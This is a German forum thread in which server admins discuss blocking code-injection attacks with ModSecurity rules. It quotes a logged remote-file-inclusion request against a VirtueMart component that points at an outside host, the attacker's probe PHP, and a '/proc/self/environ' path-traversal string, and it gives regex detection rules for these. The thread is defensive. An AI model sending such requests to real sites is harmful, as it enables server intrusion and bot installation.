Hackversuch per Code-Injection ?

Klar :D

modsec2iptables = fbis.ch - Entwicklung

Code: 
SecFilterSelective THE_REQUEST "\.\.\/\.\.\/\.\.\/proc\/self\/environ"

Da hier keine "Action" angegeben wurde, greift bei mir:

Code: 
SecFilterDefaultAction "deny,log,status:403,exec:/pfad/zu/modsec2iptables"

Ich setze modsec2iptables mittlerweile auf 3 Servern ein. Schreibt man nun seine Rules selbst(ein Wochenende Logfiles studieren)
hält man sich viel Gesindel vom Hals.
 
Last edited by a moderator:
Ich häng mich da jetzt mal dran weil ich hier einen ähnlichen Fall habe auf einem zu Glück nicht produktiv vServer. Ich hab heut Nacht wie jede Nacht das Logfile studiert und folgendes Gefunden.

Code: 
"GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/1??

Inhalt der file hinter der URL

Code: 
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Darauf hin ich direkt auf den vServer. Direkt Apache gestoppt! Schotten dicht gemacht und mal die Logs durchwühlt.

Daraufhin hab ich im /tmp Verzeichnis eine File bind.tar.gz gefunden. Die da definitv nicht hingehört und auch ein irc bot enhält.

Ich meine die Lücke ist mir klar und wird nach der Neuinstallation direkt geschlossen. Hat leider versäumt das Update Januar 2009 von VirtueMart zu installieren.

Kann ich solchen Dingen auch mit ModSecurity entgegenwirken ... ?
 
zB. mit (keine Garantie):
ver.1.9.5 only !2.x

mosConfig_absolute_path=http://www.IchBinEinZombie.com/zero/1??

Code: 
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)[COLOR="DarkGreen"]/zero/[0-9]\?[/COLOR]"

Das kann man natürlich noch optimieren.

Und dann evtl. etwas in diese Richtung gehen:

Code: 
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"
SecFilterSelective REQUEST_URI  "\.php\?.*=(http|https|ftp)\:/.*\?&cmd="

Wirkt bei folgenden Krempel:

=http://www.blabla.ar/components/com_sef/1.txt??
 
Last edited by a moderator:
You must log in or register to reply here.
Back
Top